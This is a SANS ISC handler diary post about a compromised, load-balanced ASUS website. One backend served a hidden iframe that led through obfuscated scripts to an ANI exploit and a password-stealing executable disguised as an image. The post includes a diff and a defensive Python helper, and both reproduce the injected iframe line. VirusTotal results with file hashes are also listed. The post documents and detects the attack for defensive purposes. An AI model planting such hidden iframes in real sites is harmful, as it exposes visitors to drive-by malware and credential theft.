SANS ISC: InfoSec Handlers Diary Blog

exploited

Published: 2007-04-06
Last Updated: 2007-04-07 17:48:47 UTC
by Swa Frantzen (Version: 2)

Over the past few days a handful of readers sent us notes that was compromised. Unfortunately, we could not find anything wrong in the HTML at all.

Today the Kaspersky blog had an entry about an ANI exploit loaded via an iframe at

So we fetched a new copy; still nothing to be seen. Then Johannes suggested might be load balanced, and indeed it is using DNS load balancing:

$ dig a

; <<>> DiG 9.2.3 <<>> a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

; IN A

;; ANSWER SECTION: 14400 IN A 14400 IN A


;; Query time: 18 msec
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page from both servers and comparing the results yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
</table><iframe src=http://[DELETED].com/app/
width=100 height=0></iframe>

Lesson learned: a load-balanced site is a pain to investigate when only some of the servers behind it are affected.
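As an added example (not code from the diary or from ASUS), here is a small Python helper that does what we did by hand above: enumerate every A record behind a name, fetch the home page from each backend individually with the real Host header, and report lines that only some backends serve, plus a check for zero-sized iframes like the one in the diff. The sample pages and the 192.0.2.x addresses are constructed; the injected line mirrors the diff shown above.

```python
import re
import socket
import urllib.request

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# width=0 / height=0 (optionally quoted or with px) is the classic hidden-iframe giveaway
ZERO_SIZE = re.compile(r"\b(?:height|width)\s*=\s*['\"]?0(?:px)?['\"]?(?=[\s>])", re.IGNORECASE)


def resolve_all(hostname):
    """Every IPv4 address the name resolves to, i.e. every round-robin backend."""
    infos = socket.getaddrinfo(hostname, 80, socket.AF_INET, socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def fetch_from_backend(hostname, ip, path="/"):
    """Fetch the page from one specific backend while presenting the site's Host header."""
    req = urllib.request.Request(f"http://{ip}{path}", headers={"Host": hostname})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("latin-1")


def backend_differences(pages):
    """pages maps backend -> body. Returns {line: backends serving it} for every
    line that is not served by all backends (the diff the diary did manually)."""
    per_backend = {ip: set(body.splitlines()) for ip, body in pages.items()}
    common = set.intersection(*per_backend.values())
    odd = {}
    for ip, lines in per_backend.items():
        for line in lines - common:
            odd.setdefault(line, []).append(ip)
    return {line: sorted(ips) for line, ips in odd.items()}


def hidden_iframes(body):
    """Iframe tags with a zero width or height, regardless of which backend served them."""
    return [m.group(0) for m in IFRAME_TAG.finditer(body) if ZERO_SIZE.search(m.group(0))]


# Constructed sample: one clean backend and one with the iframe appended after </table>.
CLEAN_PAGE = "<html>\n<body>\n<table><tr><td>home</td></tr></table>\n</body>\n</html>\n"
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</table>", "</table><iframe src=http://[DELETED].com/app/ width=100 height=0></iframe>")
SAMPLE_PAGES = {"192.0.2.10": CLEAN_PAGE, "192.0.2.11": INJECTED_PAGE}


def audit_host(hostname, path="/"):
    """Live check: fetch path from every backend and return the per-backend differences."""
    pages = {ip: fetch_from_backend(hostname, ip, path) for ip in resolve_all(hostname)}
    return backend_differences(pages)
```

Run `audit_host("www.example.com")` against a site you are responsible for to see which backend serves which extra lines; `hidden_iframes()` can then be applied to each fetched body.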

The script, at the time we looked at it, was obfuscated and led to a VBScript that is up to no good: it points to another obfuscated JavaScript and to an executable cloaked as a JPG file.

That file gives the following results at VirusTotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 20070406
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

A password stealer, it seems: the same old goal.

I have not seen an ANI exploit in there right now, but we could easily be looking at something that is dynamic in some other way as well.

It seems ASUS has taken down the hacked server in the meantime.

That second JavaScript referred to in the VBScript above did not decode; it seems it is simply not encoded correctly. However, when decoding the string with a plain base64 routine, it does decode to what leads to an ANI exploit. You never know what a buggy script and a buggy browser will do together.

Roger tested other language versions of the ASUS websites, and there are more references to the first JavaScript out there, with an iframe loading it.

Off to warn them once again...

Swa Frantzen -- NET2S

